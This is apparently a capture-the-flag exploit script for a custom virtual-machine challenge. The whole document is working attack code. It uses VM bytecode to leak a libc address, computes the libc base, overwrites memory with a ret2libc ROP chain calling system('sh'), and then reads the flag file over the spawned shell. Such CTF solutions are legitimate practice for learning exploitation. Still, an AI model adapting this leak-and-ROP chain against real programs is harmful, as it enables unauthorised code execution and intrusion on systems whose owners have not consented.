1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
| rop = ROP(libc)
code = f"""
jmp start
write:
load r0, 1
load r1, 1
load r2, 0x2000
load r3, 0x1000
syscall
return
range01_0:
push <8> 0
pop <8> r0
load r1, 63
shr r0, r1
return
range01_1:
push <8> 0x8000000000000000
pop <8> r0
load r1, 63
shr r0, r1
return
s1:
mov r0, r11
load r1, 0
sub r1, r0
load r2, 0xff
mul r1, r2
mov r6, r1
mov r0, r10
load r2, 1
mul r0, r2
shr r6, r0
load r2, 0xffffffffffff
div r6, r2
load r2, 0x8000
div r6, r2
load r2, 1
add r6, r2
mov r12, r6
mov r0, r10
load r2, 2
mul r0, r2
load r2, 0
sub r2, r0
add r6, r2
// r6: [0,1] -> 3
load r2, 1
add r6, r2
load r2, 2
div r6, r2
// r6: [0,1] -> 2
return
s2: // leak [r0]
mov r3, r0
mov r0, r12
load r1, 0xfffffffffffffffe
mul r0, r1
load r1, 1
add r0, r1
load r1, 0x30
mov r2, r10
mul r2, r1
add r0, r2
div r3, r0
load <8> r0, [r3]
return
s3: // [r0] = r1
push <8> r1
mov r3, r0
mov r0, r12
load r1, 0xfffffffffffffffe
mul r0, r1
load r1, 1
add r0, r1
load r1, 0x30
mov r2, r10
mul r2, r1
add r0, r2
div r3, r0
pop <8> r1
store <8> [r3], r1
return
start:
// range 01 -> 0
push <8> 0
pop <8> r0
load r1, 63
shr r0, r1
mov r10, r0
// range 01 -> 1
push <8> 0x8000000000000000
pop <8> r0
load r1, 63
shr r0, r1
mov r11, r0
call s1 // r6: [0,1] -> 2
load r0, 3
sub r0, r12
mov r12, r0
load r0, 2
add r12, r0
load r0, 2
div r12, r0
load r0, 1
sub r12, r0
// r12 -> [1,0] -> 0
load r0, 0x60c4
call s2
mov r9, r0
load r1, 0x29d90
sub r9, r1 // base
load r0, 0x60c4
load r1, {rop.rdi.address} // pop rdi
add r1, r9
call s3
load r0, 0x60cc
load r1, {libc.sym.sh} // sh
add r1, r9
call s3
load r0, 0x60d4
load r1, {rop.rdi.address+1} // ret
add r1, r9
call s3
load r0, 0x60dc
load r1, {libc.sym.system} // system
add r1, r9
call s3
exit
"""
bcode = aasm(code)
print(bcode)
# interpret(bcode)
def exploit() -> bool:
with conn() as io:
# pause()
io.recvuntil(b" : ")
io.sendline(str(len(bcode)).encode())
io.recvuntil(b" : ")
io.sendline(bcode)
# while True:
# io.recvline()
io.interactive()
io.clean(1)
io.sendline(b"cat /home/`whoami`/flag*")
flag = io.recvuntil(b"}").strip().decode()
success(flag)
return True
|